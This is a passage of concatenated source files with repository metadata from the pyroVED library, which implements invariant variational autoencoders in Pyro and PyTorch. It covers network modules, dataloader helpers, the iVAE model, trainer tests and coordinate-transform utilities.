self.activation_out(self.fc12(x))\n alpha = torch.softmax(self.fc13(x), dim=-1)\n return mu, sigma, alpha\n\n\nclass fcDecoderNet(nn.Module):\n \"\"\"\n Standard fully-connected decoder for VAE\n \"\"\"\n def __init__(self,\n out_dim: Tuple[int],\n latent_dim: int,\n c_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n sigmoid_out: bool = True,\n unflat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcDecoderNet, self).__init__()\n if len(out_dim) not in [1, 2, 3]:\n 
raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.unflat = unflat\n if self.unflat:\n self.reshape = out_dim\n out_dim = torch.prod(tt(out_dim)).item()\n\n self.concat = Concat()\n self.fc_layers = make_fc_layers(\n latent_dim+c_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, out_dim)\n self.activation_out = nn.Sigmoid() if sigmoid_out else lambda x: x\n\n def forward(self, z: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n z = self.concat(z)\n x = self.fc_layers(z)\n x = self.activation_out(self.out(x))\n if self.unflat:\n return x.view(-1, *self.reshape)\n return x\n\n\nclass sDecoderNet(nn.Module):\n \"\"\"\n Spatial generator (decoder) network with fully-connected layers\n \"\"\"\n def __init__(self,\n out_dim: Tuple[int],\n latent_dim: int,\n c_dim: int = 0,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh',\n sigmoid_out: bool = True,\n unflat: bool = True\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(sDecoderNet, self).__init__()\n if len(out_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.unflat = unflat\n if self.unflat:\n self.reshape = out_dim\n coord_dim = 1 if len(out_dim) < 2 else 2\n\n self.concat = Concat()\n self.coord_latent = coord_latent(\n latent_dim+c_dim, hidden_dim, coord_dim)\n self.fc_layers = make_fc_layers(\n hidden_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, 1) # need to generalize to multi-channel (c > 1)\n self.activation_out = nn.Sigmoid() if sigmoid_out else lambda x: x\n\n def forward(self, x_coord: torch.Tensor, z: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n z = self.concat(z)\n x = self.coord_latent(x_coord, z)\n x = self.fc_layers(x)\n x = self.activation_out(self.out(x))\n if self.unflat:\n return x.view(-1, *self.reshape)\n return x\n\n\nclass coord_latent(nn.Module):\n \"\"\"\n The \"spatial\" part of the trVAE's decoder 
that allows for translational\n and rotational invariance (based on https://arxiv.org/abs/1909.11663)\n \"\"\"\n def __init__(self,\n latent_dim: int,\n out_dim: int,\n ndim: int = 2,\n activation_out: bool = True) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(coord_latent, self).__init__()\n self.fc_coord = nn.Linear(ndim, out_dim)\n self.fc_latent = nn.Linear(latent_dim, out_dim, bias=False)\n self.activation = nn.Tanh() if activation_out else None\n\n def forward(self,\n x_coord: torch.Tensor,\n z: Tuple[torch.Tensor]) -> torch.Tensor:\n batch_dim, n = x_coord.size()[:2]\n x_coord = x_coord.reshape(batch_dim * n, -1)\n h_x = self.fc_coord(x_coord)\n h_x = h_x.reshape(batch_dim, n, -1)\n h_z = self.fc_latent(z)\n\n h_z = h_z.view(-1, h_z.size(-1))\n h = h_x.add(h_z.unsqueeze(1))\n h = h.reshape(batch_dim * n, -1)\n if self.activation is not None:\n h = self.activation(h)\n return h\n\n\nclass fcClassifierNet(nn.Module):\n \"\"\"\n Simple classification neural network with fully-connected layers only.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n num_classes: int,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh'\n ) -> None:\n \"\"\"\n Initializes module\n \"\"\"\n super(fcClassifierNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item()\n\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, num_classes)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.fc_layers(x)\n x = self.out(x)\n return torch.softmax(x, dim=-1)\n\n\nclass fcRegressorNet(nn.Module):\n \"\"\"\n Simple classification neural network with fully-connected layers only.\n \"\"\"\n def __init__(self,\n in_dim: Tuple[int],\n c_dim: int,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = 'tanh'\n ) -> None:\n 
\"\"\"\n Initializes module\n \"\"\"\n super(fcRegressorNet, self).__init__()\n if len(in_dim) not in [1, 2, 3]:\n raise ValueError(\"in_dim must be (h, w), (h, w, c), or (l,)\")\n self.in_dim = torch.prod(tt(in_dim)).item()\n\n self.fc_layers = make_fc_layers(\n self.in_dim, hidden_dim, num_layers, activation)\n self.out = nn.Linear(hidden_dim, c_dim)\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Forward pass\n \"\"\"\n x = self.fc_layers(x)\n return self.out(x)\n\n\ndef make_fc_layers(in_dim: int,\n hidden_dim: int = 128,\n num_layers: int = 2,\n activation: str = \"tanh\"\n ) -> Type[nn.Module]:\n \"\"\"\n Generates a module with stacked fully-connected (aka dense) layers\n \"\"\"\n fc_layers = []\n for i in range(num_layers):\n hidden_dim_ = in_dim if i == 0 else hidden_dim\n fc_layers.extend(\n [nn.Linear(hidden_dim_, hidden_dim),\n get_activation(activation)()])\n fc_layers = nn.Sequential(*fc_layers)\n return fc_layers\n" }, { "alpha_fraction": 0.6146341562271118, "alphanum_fraction": 0.6162601709365845, "avg_line_length": 37.4375, "blob_id": "e533c5f0edeaa5e861463ba44cb4018093d36be6", "content_id": "f23bfb1e4e75a440bf3245a5cb366c8e58e77253", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1845, "license_type": "permissive", "max_line_length": 81, "num_lines": 48, "path": "/pyroved/utils/data.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Tuple, Type\n\nimport torch\n\n\ndef init_dataloader(*args: torch.Tensor,\n random_sampler: bool = False,\n shuffle: bool = True,\n **kwargs: int\n ) -> Type[torch.utils.data.DataLoader]:\n \"\"\"\n Returns initialized PyTorch dataloader, which is used by pyroVED's trainers.\n The inputs are torch Tensor objects containing training data and (optionally)\n labels.\n\n Example:\n\n >>> # Load training data stored as numpy array\n >>> train_data = np.load(\"my_training_data.npy\")\n >>> # 
Transform numpy array to toech Tensor object\n >>> train_data = torch.from_numpy(train_data).float()\n >>> # Initialize dataloader\n >>> train_loader = init_dataloader(train_data)\n \"\"\"\n batch_size = kwargs.get(\"batch_size\", 100)\n tensor_set = torch.utils.data.dataset.TensorDataset(*args)\n if random_sampler:\n sampler = torch.utils.data.RandomSampler(tensor_set)\n data_loader = torch.utils.data.DataLoader(\n dataset=tensor_set, batch_size=batch_size, sampler=sampler)\n else:\n data_loader = torch.utils.data.DataLoader(\n dataset=tensor_set, batch_size=batch_size, shuffle=shuffle)\n return data_loader\n\n\ndef init_ssvae_dataloaders(data_unsup: torch.Tensor,\n data_sup: Tuple[torch.Tensor],\n data_val: Tuple[torch.Tensor],\n **kwargs: int\n ) -> Tuple[Type[torch.utils.data.DataLoader]]:\n \"\"\"\n Helper function to initialize dataloader for ss-VAE models\n \"\"\"\n loader_unsup = init_dataloader(data_unsup, **kwargs)\n loader_sup = init_dataloader(*data_sup, sampler=True, **kwargs)\n loader_val = init_dataloader(*data_val, **kwargs)\n return loader_unsup, loader_sup, loader_val\n" }, { "alpha_fraction": 0.5563721060752869, "alphanum_fraction": 0.5642588138580322, "avg_line_length": 38.99283218383789, "blob_id": "ea09e997d4f278c698ed57a17d6cbf8353d70575", "content_id": "bf20ff2761a53677b7700d026a302b4b0df5ec82", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 11158, "license_type": "permissive", "max_line_length": 89, "num_lines": 279, "path": "/pyroved/models/ivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nivae.py\n=======\n\nVariational autoencoder with invariance to rotations, translations, and scale\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\n\nfrom typing import Optional, Tuple, Union, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom pyroved.models.base import baseVAE\nfrom pyroved.nets import 
fcDecoderNet, fcEncoderNet, sDecoderNet\nfrom pyroved.utils import (\n generate_grid, generate_latent_grid, get_sampler,\n plot_img_grid, plot_spect_grid, set_deterministic_mode,\n to_onehot, transform_coordinates\n)\n\n\nclass iVAE(baseVAE):\n \"\"\"\n Variational autoencoder that enforces rotational, translational,\n and scale invariances.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (height x width) for images\n or (length,) for spectra.\n latent_dim:\n Number of latent dimensions.\n invariances:\n List with invariances to enforce. For 2D systems, `r` enforces\n rotational invariance, `t` enforces invariance to\n translations, `sc` enforces a scale invariance, and\n invariances=None corresponds to vanilla VAE.\n For 1D systems, 't' enforces translational invariance and\n invariances=None is vanilla VAE\n c_dim:\n \"Feature dimension\" of the c vector in p(z|c) where z is\n explicitly conditioned on variable c. The latter can be continuous\n or discrete. For example, to train a class-conditional VAE on\n a dataset with 10 classes, the c_dim must be equal to 10 and\n the corresponding n x 10 vector should represent one-hot encoded labels.\n (The default c_dim value is 0, i.e. no conditioning is performed).\n hidden_dim_e:\n Number of hidden units per each layer in encoder (inference\n network). (The default is 128).\n hidden_dim_d:\n Number of hidden units per each layer in decoder (generator\n network). (The default is 128).\n num_layers_e:\n Number of layers in encoder (inference network). (The default is\n 2).\n num_layers_d:\n Number of layers in decoder (generator network). 
(The default is\n 2).\n activation:\n Non-linear activation for inner layers of encoder and decoder.\n The available activations are ReLU ('relu'), leaky ReLU ('lrelu'),\n hyberbolic tangent ('tanh'), softplus ('softplus'), and GELU ('gelu').\n (The default is 'tanh').\n sampler_d:\n Decoder sampler, as defined as p(x|z) = sampler(decoder(z)).\n The available samplers are 'bernoulli', 'continuous_bernoulli',\n and 'gaussian'. (The default is \"bernoulli\").\n sigmoid_d:\n Sigmoid activation for the decoder output. (The default is True).\n seed:\n Seed used in torch.manual_seed(seed) and\n torch.cuda.manual_seed_all(seed). (The default is 1).\n\n Keyword Args:\n device:\n Sets device to which model and data will be moved.\n Defaults to 'cuda:0' if a GPU is available and to CPU otherwise.\n dx_prior:\n Translational prior in x direction (float between 0 and 1)\n dy_prior:\n Translational prior in y direction (float between 0 and 1)\n sc_prior:\n Scale prior (usually, sc_prior << 1)\n decoder_sig:\n Sets sigma for a \"gaussian\" decoder sampler\n\n Examples:\n Initialize a VAE model with rotational invariance\n\n >>> data_dim = (28, 28)\n >>> rvae = iVAE(data_dim, latent_dim=2, invariances=['r'])\n\n Initialize a class-conditional VAE model with rotational and\n translational invarainces for dataset that has 10 classes\n\n >>> data_dim = (28, 28)\n >>> rvae = iVAE(data_dim, latent_dim=2, c_dim=10, invariances=['r', 't'])\n \"\"\"\n\n def __init__(\n self,\n data_dim: Tuple[int],\n latent_dim: int = 2,\n invariances: List[str] = None,\n c_dim: int = 0,\n hidden_dim_e: int = 128,\n hidden_dim_d: int = 128,\n num_layers_e: int = 2,\n num_layers_d: int = 2,\n activation: str = \"tanh\",\n sampler_d: str = \"bernoulli\",\n sigmoid_d: bool = True,\n seed: int = 1,\n **kwargs: Union[str, float]\n ) -> None:\n args = (data_dim, invariances)\n super(iVAE, self).__init__(*args, **kwargs)\n\n # Reset the pyro ParamStoreDict object's dictionaries\n pyro.clear_param_store()\n # 
Set all torch manual seeds\n set_deterministic_mode(seed)\n\n # Initialize the encoder network\n self.encoder_z = fcEncoderNet(\n data_dim, latent_dim + self.coord, 0, hidden_dim_e, num_layers_e,\n activation, softplus_out=True\n )\n # Initialize the decoder network\n dnet = sDecoderNet if 0 < self.coord < 5 else fcDecoderNet\n self.decoder = dnet(\n data_dim, latent_dim, c_dim, hidden_dim_d, num_layers_d,\n activation, sigmoid_out=sigmoid_d\n )\n # Initialize the decoder's sampler\n self.sampler_d = get_sampler(sampler_d, **kwargs)\n\n # Sets continuous and discrete dimensions\n self.z_dim = latent_dim + self.coord\n self.c_dim = c_dim\n\n # Move model parameters to appropriate device\n self.to(self.device)\n\n def model(self,\n x: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the model p(x|z)p(z)\n \"\"\"\n # register PyTorch module `decoder` with Pyro\n pyro.module(\"decoder\", self.decoder)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n reshape_ = torch.prod(torch.tensor(x.shape[1:])).item()\n with pyro.plate(\"data\", x.shape[0]):\n # setup hyperparameters for prior p(z)\n z_loc = x.new_zeros(torch.Size((x.shape[0], self.z_dim)))\n z_scale = x.new_ones(torch.Size((x.shape[0], self.z_dim)))\n # sample from prior (value will be sampled by guide when computing the ELBO)\n with pyro.poutine.scale(scale=beta):\n z = pyro.sample(\"latent\", dist.Normal(z_loc, z_scale).to_event(1))\n if self.coord > 0: # rotationally- and/or translationaly-invariant mode\n # Split latent variable into parts for rotation\n # and/or translation and image content\n phi, dx, sc, z = self.split_latent(z)\n if 't' in self.invariances:\n dx = (dx * self.t_prior).unsqueeze(1)\n # transform coordinate grid\n grid = self.grid.expand(x.shape[0], *self.grid.shape)\n x_coord_prime = transform_coordinates(grid, phi, dx, sc)\n # Add class label (if any)\n if y is not None:\n z = 
torch.cat([z, y], dim=-1)\n # decode the latent code z together with the transformed coordinates (if any)\n dec_args = (x_coord_prime, z) if self.coord else (z,)\n loc = self.decoder(*dec_args)\n # score against actual images (\"binary cross-entropy loss\")\n pyro.sample(\n \"obs\", self.sampler_d(loc.view(-1, reshape_)).to_event(1),\n obs=x.view(-1, reshape_))\n\n def guide(self,\n x: torch.Tensor,\n y: Optional[torch.Tensor] = None,\n **kwargs: float) -> None:\n \"\"\"\n Defines the guide q(z|x)\n \"\"\"\n # register PyTorch module `encoder_z` with Pyro\n pyro.module(\"encoder_z\", self.encoder_z)\n # KLD scale factor (see e.g. https://openreview.net/pdf?id=Sy2fzU9gl)\n beta = kwargs.get(\"scale_factor\", 1.)\n with pyro.plate(\"data\", x.shape[0]):\n # use the encoder to get the parameters used to define q(z|x)\n z_loc, z_scale = self.encoder_z(x)\n # sample the latent code z\n with pyro.poutine.scale(scale=beta):\n pyro.sample(\"latent\", dist.Normal(z_loc, z_scale).to_event(1))\n\n def split_latent(self, z: torch.Tensor) -> Tuple[torch.Tensor]:\n \"\"\"\n Split latent variable into parts for rotation\n and/or translation and image content\n \"\"\"\n return self._split_latent(z)\n\n def encode(self, x_new: torch.Tensor, **kwargs: int) -> torch.Tensor:\n \"\"\"\n Encodes data using a trained inference (encoder) network\n\n Args:\n x_new:\n Data to encode with a trained (i)VAE model. The new data must have\n the same dimensions (images height and width or spectra length)\n as the one used for training.\n kwargs:\n Batch size as 'batch_size' (for encoding large volumes of data)\n \"\"\"\n z = self._encode(x_new)\n z_loc, z_scale = z.split(self.z_dim, 1)\n return z_loc, z_scale\n\n def decode(self,\n z: torch.Tensor,\n y: torch.Tensor = None,\n **kwargs: int) -> torch.Tensor:\n \"\"\"\n Decodes a batch of latent coordnates\n\n Args:\n z: Latent coordinates (without rotational and translational parts)\n y: Conditional \"property\" vector (e.g. 
one-hot encoded class vector)\n kwargs: Batch size as 'batch_size'\n \"\"\"\n z = z.to(self.device)\n if y is not None:\n z = torch.cat([z, y.to(self.device)], -1)\n loc = self._decode(z, **kwargs)\n return loc\n\n def manifold2d(self, d: int,\n y: torch.Tensor = None,\n plot: bool = True,\n **kwargs: Union[str, int, float]) -> torch.Tensor:\n \"\"\"\n Plots a learned latent manifold in the image space\n\n Args:\n d: Grid size\n plot: Plots the generated manifold (Default: True)\n y: Conditional \"property\" vector (e.g. one-hot encoded class vector)\n kwargs: Keyword arguments include custom min/max values\n for grid boundaries passed as 'z_coord'\n (e.g. z_coord = [-3, 3, -3, 3]), 'angle' and\n 'shift' to condition a generative model on, and plot parameters\n ('padding', 'padding_value', 'cmap', 'origin', 'ylim')\n \"\"\"\n z, (grid_x, grid_y) = generate_latent_grid(d, **kwargs)\n z = [z]\n if self.c_dim > 0:\n if y is None:\n raise ValueError(\"To generate a manifold pass a conditional vector y\") \n y = y.unsqueeze(1) if 0 < y.ndim < 2 else y\n z = z + [y.expand(z[0].shape[0], *y.shape[1:])]\n loc = self.decode(*z, **kwargs)\n if plot:\n if self.ndim == 2:\n plot_img_grid(\n loc, d,\n extent=[grid_x.min(), grid_x.max(), grid_y.min(), grid_y.max()],\n **kwargs)\n elif self.ndim == 1:\n plot_spect_grid(loc, d, **kwargs)\n return loc\n" }, { "alpha_fraction": 0.6275473237037659, "alphanum_fraction": 0.6422852873802185, "avg_line_length": 41.604652404785156, "blob_id": "40549df54654bb13b3e9f97de1c0699c15a533fb", "content_id": "ca4903eaf2da72cbfb39dc9fec3234eebcd71004", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5496, "license_type": "permissive", "max_line_length": 85, "num_lines": 129, "path": "/tests/test_trainers.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "import sys\nfrom copy import deepcopy as dc\n\nimport torch\nimport pyro.distributions as dist\nimport 
pytest\nimport numpy as np\nfrom numpy.testing import assert_\n\nsys.path.append(\"../../\")\n\nfrom pyroved import models, utils, trainers\n\ntt = torch.tensor\n\n\ndef assert_weights_equal(m1, m2):\n eq_w = []\n for p1, p2 in zip(m1.values(), m2.values()):\n eq_w.append(np.array_equal(\n p1.detach().cpu().numpy(),\n p2.detach().cpu().numpy()))\n return all(eq_w)\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_svi_trainer_trvae(invariances):\n data_dim = (5, 8, 8)\n train_data = torch.randn(*data_dim)\n test_data = torch.randn(*data_dim)\n train_loader = utils.init_dataloader(train_data, batch_size=2)\n test_loader = utils.init_dataloader(test_data, batch_size=2)\n vae = models.iVAE(data_dim[1:], 2, invariances)\n trainer = trainers.SVItrainer(vae)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(train_loader, test_loader)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.loss_history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_svi_trainer_jtrvae(invariances):\n data_dim = (6, 8, 8)\n train_data = torch.randn(*data_dim)\n train_loader = utils.init_dataloader(train_data, batch_size=2)\n vae = models.jiVAE(data_dim[1:], 2, 3, invariances)\n trainer = trainers.SVItrainer(vae, enumerate_parallel=True)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(train_loader)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.loss_history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_auxsvi_trainer_cls(invariances):\n data_dim = (5, 8, 8)\n train_unsup = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n train_sup = train_unsup + .1 * 
torch.randn_like(train_unsup)\n labels = dist.OneHotCategorical(torch.ones(data_dim[0], 3)).sample()\n loader_unsup, loader_sup, loader_val = utils.init_ssvae_dataloaders(\n train_unsup, (train_sup, labels), (train_sup, labels), batch_size=2)\n vae = models.ssiVAE(data_dim[1:], 2, 3, invariances)\n trainer = trainers.auxSVItrainer(vae)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(loader_unsup, loader_sup, loader_val)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"c_dim\", [1, 2])\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_auxsvi_trainer_reg(c_dim, invariances):\n data_dim = (5, 8, 8)\n train_unsup = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n train_sup = train_unsup + .1 * torch.randn_like(train_unsup)\n gt = torch.randn(data_dim[0], c_dim)\n\n loader_unsup, loader_sup, loader_val = utils.init_ssvae_dataloaders(\n train_unsup, (train_sup, gt), (train_sup, gt), batch_size=2)\n vae = models.ss_reg_iVAE(data_dim[1:], 2, c_dim, invariances)\n trainer = trainers.auxSVItrainer(vae, task=\"regression\")\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(loader_unsup, loader_sup, loader_val)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n\n\[email protected](\"invariances\", [None, ['r'], ['s'], ['t'], ['r', 't', 's']])\ndef test_auxsvi_trainer_swa(invariances):\n data_dim = (5, 8, 8)\n train_unsup = torch.randn(data_dim[0], torch.prod(tt(data_dim[1:])).item())\n train_sup = train_unsup + .1 * torch.randn_like(train_unsup)\n labels = dist.OneHotCategorical(torch.ones(data_dim[0], 3)).sample()\n loader_unsup, loader_sup, _ = utils.init_ssvae_dataloaders(\n train_unsup, 
(train_sup, labels), (train_sup, labels), batch_size=2)\n vae = models.ssiVAE(data_dim[1:], 2, 3, invariances)\n trainer = trainers.auxSVItrainer(vae)\n for _ in range(3):\n trainer.step(loader_unsup, loader_sup)\n trainer.save_running_weights(\"encoder_y\")\n weights_final = dc(vae.encoder_y.state_dict())\n trainer.average_weights(\"encoder_y\")\n weights_aver = vae.encoder_y.state_dict()\n assert_(not assert_weights_equal(weights_final, weights_aver))\n\n\[email protected](\"input_dim, output_dim\",\n [((8,), (8, 8)), ((8, 8), (8,)),\n ((8,), (8,)), ((8, 8), (8, 8))])\ndef test_svi_trainer_ved(input_dim, output_dim):\n train_data_x = torch.randn(5, 1, *input_dim)\n train_data_y = torch.randn(5, 1, *output_dim)\n train_loader = utils.init_dataloader(train_data_x, train_data_y, batch_size=2)\n vae = models.VED(input_dim, output_dim)\n trainer = trainers.SVItrainer(vae)\n weights_before = dc(vae.state_dict())\n for _ in range(2):\n trainer.step(train_loader)\n weights_after = vae.state_dict()\n assert_(not torch.isnan(tt(trainer.loss_history[\"training_loss\"])).any())\n assert_(not assert_weights_equal(weights_before, weights_after))\n" }, { "alpha_fraction": 0.561215341091156, "alphanum_fraction": 0.5846738219261169, "avg_line_length": 32.654136657714844, "blob_id": "1b240d37b807b1887a6d79305bc6990135b80ab0", "content_id": "6bab0c3ff5ec6ab9b6bb3581b59443d41eb9b660", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4476, "license_type": "permissive", "max_line_length": 78, "num_lines": 133, "path": "/pyroved/utils/coord.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "from typing import Union, Tuple\nimport torch\nimport pyro.distributions as dist\ntt = torch.tensor\n\n\ndef grid2xy(X1: torch.Tensor, X2: torch.Tensor) -> torch.Tensor:\n X = torch.cat((X1[None], X2[None]), 0)\n d0, d1 = X.shape[0], X.shape[1] * X.shape[2]\n X = X.reshape(d0, d1).T\n return X\n\n\ndef 
imcoordgrid(im_dim: Tuple[int]) -> torch.Tensor:\n xx = torch.linspace(-1, 1, im_dim[0])\n yy = torch.linspace(1, -1, im_dim[1])\n x0, x1 = torch.meshgrid(xx, yy)\n return grid2xy(x0, x1)\n\n\ndef generate_grid(data_dim: Tuple[int]) -> torch.Tensor:\n \"\"\"Generates 1D or 2D grid of coordinates. Returns a torch tensor with two\n axes. If the input data_dim indicates only one dimensional data, then the\n output will be a 2d torch tensor artificially augmented along the last\n dimension, of shape [N, 1].\n\n Args:\n data_dim:\n Dimensions of the input data.\n\n Raises:\n NotImplementedError:\n If the dimension (length) of the provided data_dim is not equal to\n 1 or 2.\n\n Returns:\n The grid (always 2d).\n \"\"\"\n\n if len(data_dim) not in [1, 2]:\n raise NotImplementedError(\"Currently supports only 1D and 2D data\")\n if len(data_dim) == 1:\n return torch.linspace(-1, 1, data_dim[0])[:, None]\n return imcoordgrid(data_dim)\n\n\ndef transform_coordinates(coord: torch.Tensor,\n phi: Union[torch.Tensor, float] = 0,\n coord_dx: Union[torch.Tensor, float] = 0,\n scale: Union[torch.Tensor, float] = 1.,\n ) -> torch.Tensor:\n \"\"\"\n Rotation of 2D coordinates followed by scaling and translation.\n For 1D grid, there is only transaltion. Operates on batches.\n \"\"\"\n if coord.shape[-1] == 1:\n return coord + coord_dx\n coord = rotate_coordinates(coord, phi)\n coord = scale_coordinates(coord, scale)\n return coord + coord_dx\n\n\ndef rotate_coordinates(coord: torch.Tensor,\n phi: Union[torch.Tensor, float] = 0\n ) -> torch.Tensor:\n \"\"\"\n Rotation of 2D coordinates. 
Operates on batches\n \"\"\"\n if torch.sum(phi) == 0:\n phi = coord.new_zeros(coord.shape[0])\n rotmat_r1 = torch.stack([torch.cos(phi), torch.sin(phi)], 1)\n rotmat_r2 = torch.stack([-torch.sin(phi), torch.cos(phi)], 1)\n rotmat = torch.stack([rotmat_r1, rotmat_r2], axis=1)\n coord = torch.bmm(coord, rotmat)\n return coord\n\n\ndef scale_coordinates(coord: torch.Tensor,\n scale: torch.Tensor\n ) -> torch.Tensor:\n \"\"\"\n Scaling of 2D coordinates. Operates on batches\n \"\"\"\n scalemat = coord.new_zeros(coord.shape[0], 2, 2)\n scalemat[:, 0, 0] = scale\n scalemat[:, 1, 1] = scale\n coord = torch.bmm(coord, scalemat)\n return coord\n\n\ndef generate_latent_grid(d: int, **kwargs) -> torch.Tensor:\n \"\"\"\n Generates a grid of latent space coordinates\n \"\"\"\n if isinstance(d, int):\n d = [d, d]\n z_coord = kwargs.get(\"z_coord\")\n if z_coord:\n z1, z2, z3, z4 = z_coord\n grid_x = torch.linspace(z2, z1, d[0])\n grid_y = torch.linspace(z3, z4, d[1])\n else:\n grid_x = dist.Normal(0, 1).icdf(torch.linspace(0.95, 0.05, d[0]))\n grid_y = dist.Normal(0, 1).icdf(torch.linspace(0.05, 0.95, d[1]))\n z = []\n for xi in grid_x:\n for yi in grid_y:\n z.append(tt([xi, yi]).float().unsqueeze(0))\n return torch.cat(z), (grid_x, grid_y)\n\n\ndef generate_latent_grid_traversal(d: int, cont_dim: int, disc_dim,\n cont_idx: int, cont_idx_fixed: int,\n num_samples: int) -> Tuple[torch.Tensor]:\n \"\"\"\n Generates continuous and discrete grids for latent space traversal\n \"\"\"\n # Get continuous latent coordinates\n samples_cont = torch.zeros(size=(num_samples, cont_dim)) + cont_idx_fixed\n cont_traversal = dist.Normal(0, 1).icdf(torch.linspace(0.95, 0.05, d))\n for i in range(d):\n for j in range(d):\n samples_cont[i * d + j, cont_idx] = cont_traversal[j]\n # Get discrete latent coordinates\n n = torch.arange(0, disc_dim)\n n = n.tile(d // disc_dim + 1)[:d]\n samples_disc = []\n for i in range(d):\n samples_disc_i = torch.zeros((d, disc_dim))\n samples_disc_i[:, n[i]] = 1\n 
samples_disc.append(samples_disc_i)\n samples_disc = torch.cat(samples_disc)\n return samples_cont, samples_disc\n" }, { "alpha_fraction": 0.5512986183166504, "alphanum_fraction": 0.5562087893486023, "avg_line_length": 39.83905029296875, "blob_id": "3d55e6c4b764ebeea270602f743c85ce55554dc8", "content_id": "20eb7bbee83d224e6048e9e35ccaa0f41f1c21fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15478, "license_type": "permissive", "max_line_length": 90, "num_lines": 379, "path": "/pyroved/models/ssivae.py", "repo_name": "matthewcarbone/pyroVED", "src_encoding": "UTF-8", "text": "\"\"\"\nssivae.py\n=========\n\nSemi-supervised variational autoencoder for data\nwith orientational, positional and scale disorders\n\nCreated by Maxim Ziatdinov (email: [email protected])\n\"\"\"\nfrom typing import Optional, Tuple, Union, Type, List\n\nimport pyro\nimport pyro.distributions as dist\nimport torch\n\nfrom .base import baseVAE\nfrom ..nets import fcDecoderNet, fcEncoderNet, sDecoderNet, fcClassifierNet\nfrom ..utils import (generate_grid, get_sampler, plot_img_grid,\n plot_spect_grid, set_deterministic_mode, to_onehot,\n transform_coordinates, init_dataloader, generate_latent_grid,\n generate_latent_grid_traversal, plot_grid_traversal)\n\ntt = torch.tensor\n\n\nclass ssiVAE(baseVAE):\n \"\"\"\n Semi-supervised variational autoencoder with the enforcement\n of rotational, translational, and scale invariances. It allows performing\n a classification of image/spectral data given a small number of examples\n even in the presence of a distribution shift between the labeled and unlabeled parts.\n\n Args:\n data_dim:\n Dimensionality of the input data; use (h x w) for images\n or (length,) for spectra.\n latent_dim:\n Number of latent dimensions.\n num_classes:\n Number of classes in the classification scheme\n invariances:\n List with invariances to enforce. 
